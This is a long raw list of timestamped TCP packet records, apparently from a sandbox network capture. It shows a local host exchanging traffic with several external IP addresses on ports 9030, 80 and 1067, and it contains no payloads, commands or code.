Jan 10, 2024 15:39:01.423230886 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.423283100 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.423297882 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.423348904 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.423366070 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.423386097 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.423430920 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.423525095 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.423542976 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.423595905 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.423614025 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.423655987 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.423765898 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.423821926 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.423841953 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.423892021 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.424041033 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.424087048 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.424098969 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.424149036 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.442821026 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.442843914 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.442856073 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.442873001 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.442881107 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.442886114 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.442914963 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.442941904 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.442944050 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.442985058 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.442998886 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.443053007 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.443057060 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.443104982 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.443208933 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.443250895 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.443459034 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.443505049 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.443981886 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.444035053 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.444050074 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.444096088 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.455327988 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.455348015 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.455374002 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.455410957 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.455413103 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.455426931 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.455456018 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.455476046 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.455595016 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.455646038 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.455681086 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.455729961 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.455760956 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.455804110 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.455816031 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.455846071 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.455867052 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.455907106 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.455928087 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.455975056 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.456163883 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.456218958 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.456269979 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.456324100 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.458425999 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.458477020 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.458487988 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.458537102 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.458600998 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.458645105 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.458941936 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.458956957 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.458969116 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.458980083 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.458992958 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.459018946 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.459018946 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.459048986 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.459104061 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.459165096 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.459170103 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.459212065 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.459223986 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.459270000 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.459271908 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.459321022 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.464334965 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.464355946 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.464385033 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.464406967 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.464428902 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.464474916 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.464483023 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.464557886 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.464580059 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.464633942 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.464654922 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.464714050 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.464721918 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.464778900 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.464813948 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.464835882 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.464852095 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.464894056 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.464900970 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.464940071 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.465002060 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.465066910 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.465075016 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.465130091 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.466250896 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.466296911 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.466309071 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.466361046 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.466450930 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.466501951 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.466502905 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.466558933 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.466676950 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.466721058 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.466754913 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.466778994 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.466800928 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.466866970 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.466881990 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.466933966 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.467089891 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.467134953 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.467153072 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.467195034 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.467319965 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.467364073 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.467371941 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.467416048 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.467425108 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.467472076 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.467478991 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.467540979 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.467547894 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.467592001 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.467613935 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.467637062 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.467638016 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.467679024 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.467713118 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.467753887 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.467783928 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.467807055 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.467814922 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.467860937 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.467874050 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.467905998 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.467911959 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.467942953 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.467947960 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.468004942 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.468017101 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.468075037 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.468100071 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.468152046 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.468166113 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.468216896 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.469146967 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.469193935 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.469244003 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.469294071 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.469350100 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.469396114 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.469402075 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.469446898 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.469454050 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.469500065 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.469535112 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.469574928 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.469763994 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.469825029 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.469841957 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.469902992 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.469929934 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.469939947 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.469971895 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.469986916 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.469990015 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.470031977 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.470448971 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.470515966 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.470520020 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.470566988 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.470566988 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.470618963 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.620218992 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.620249033 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.620274067 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.620311975 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.620378017 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.620420933 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.620470047 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.620482922 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.620553017 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.620579004 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.620630980 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.620666981 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.620724916 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.620747089 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.620805025 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.620810986 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.620866060 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.620929003 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.620991945 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.621020079 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.621083021 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.621362925 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.621418953 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.621426105 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.621476889 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.621495962 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.621552944 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.621568918 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.621627092 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.621718884 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.621778965 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.621814966 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.621864080 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.621927977 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.621994019 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.622005939 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.622060061 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.622064114 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.622107983 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.622184992 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.622232914 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.622252941 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.622296095 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.622353077 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.622417927 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.622445107 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.622500896 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.622505903 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.622555971 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.622576952 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.622636080 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.622638941 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.622694969 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.622940063 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.622992992 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.623028040 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.623097897 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.623131037 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.623188019 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.623219967 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.623281002 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.623316050 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.623370886 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.623384953 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.623444080 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.623460054 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.623521090 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.623558044 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.623614073 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.623802900 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.623853922 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.623888016 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.623943090 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.623975039 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.624027014 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.624032974 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.624089956 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.624110937 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.624178886 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.624209881 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.624233961 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.624252081 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.624300957 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.624320984 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.624382019 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.624382973 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.624403954 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.624429941 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.624469042 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.706959963 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.913101912 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:03.109703064 CET	80	49719	185.215.113.93	192.168.2.6
Jan 10, 2024 15:39:03.109802008 CET	49719	80	192.168.2.6	185.215.113.93
Jan 10, 2024 15:39:12.129862070 CET	49727	1067	192.168.2.6	95.217.42.50
Jan 10, 2024 15:39:12.338403940 CET	1067	49727	95.217.42.50	192.168.2.6
Jan 10, 2024 15:39:12.844546080 CET	49727	1067	192.168.2.6	95.217.42.50
Jan 10, 2024 15:39:13.053128004 CET	1067	49727	95.217.42.50	192.168.2.6
Jan 10, 2024 15:39:13.563569069 CET	49727	1067	192.168.2.6	95.217.42.50
Jan 10, 2024 15:39:13.771920919 CET	1067	49727	95.217.42.50	192.168.2.6
Jan 10, 2024 15:39:14.277652979 CET	49727	1067	192.168.2.6	95.217.42.50
Jan 10, 2024 15:39:14.485780001 CET	1067	49727	95.217.42.50	192.168.2.6
Jan 10, 2024 15:39:15.000901937 CET	49727	1067	192.168.2.6	95.217.42.50
Jan 10, 2024 15:39:15.209377050 CET	1067	49727	95.217.42.50	192.168.2.6
Jan 10, 2024 15:39:15.212143898 CET	49728	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:39:15.319752932 CET	80	49728	199.58.81.140	192.168.2.6
Jan 10, 2024 15:39:15.319920063 CET	49728	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:39:15.320205927 CET	49728	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:39:15.428242922 CET	80	49728	199.58.81.140	192.168.2.6
Jan 10, 2024 15:39:15.428867102 CET	80	49728	199.58.81.140	192.168.2.6
Jan 10, 2024 15:39:15.428913116 CET	80	49728	199.58.81.140	192.168.2.6
Jan 10, 2024 15:39:15.429019928 CET	80	49728	199.58.81.140	192.168.2.6
Jan 10, 2024 15:39:15.429053068 CET	49728	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:39:15.429054022 CET	49728	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:39:15.429097891 CET	49728	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:39:15.429102898 CET	80	49728	199.58.81.140	192.168.2.6
Jan 10, 2024 15:39:15.429203033 CET	80	49728	199.58.81.140	192.168.2.6
Jan 10, 2024 15:39:15.429219961 CET	49728	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:39:15.429248095 CET	49728	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:39:15.429276943 CET	80	49728	199.58.81.140	192.168.2.6
Jan 10, 2024 15:39:15.429322958 CET	49728	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:39:15.429373026 CET	80	49728	199.58.81.140	192.168.2.6
Jan 10, 2024 15:39:15.429423094 CET	49728	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:39:15.429464102 CET	80	49728	199.58.81.140	192.168.2.6
Jan 10, 2024 15:39:15.429511070 CET	49728	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:39:15.429548025 CET	80	49728	199.58.81.140	192.168.2.6
Jan 10, 2024 15:39:15.429595947 CET	49728	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:39:15.429630041 CET	80	49728	199.58.81.140	192.168.2.6
Jan 10, 2024 15:39:15.429678917 CET	49728	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:39:15.536860943 CET	80	49728	199.58.81.140	192.168.2.6
Jan 10, 2024 15:39:15.536907911 CET	80	49728	199.58.81.140	192.168.2.6
Jan 10, 2024 15:39:15.536962032 CET	49728	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:39:15.536988020 CET	49728	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:39:15.537080050 CET	80	49728	199.58.81.140	192.168.2.6
Jan 10, 2024 15:39:15.537148952 CET	80	49728	199.58.81.140	192.168.2.6
Jan 10, 2024 15:39:15.537200928 CET	49728	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:39:15.537275076 CET	80	49728	199.58.81.140	192.168.2.6
Jan 10, 2024 15:39:15.537324905 CET	49728	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:39:15.537348986 CET	80	49728	199.58.81.140	192.168.2.6
Jan 10, 2024 15:39:15.537405968 CET	49728	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:39:15.537416935 CET	49728	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:39:15.537420034 CET	80	49728	199.58.81.140	192.168.2.6
Jan 10, 2024 15:39:15.537504911 CET	49728	80	192.168.2.6	199.58.81.140
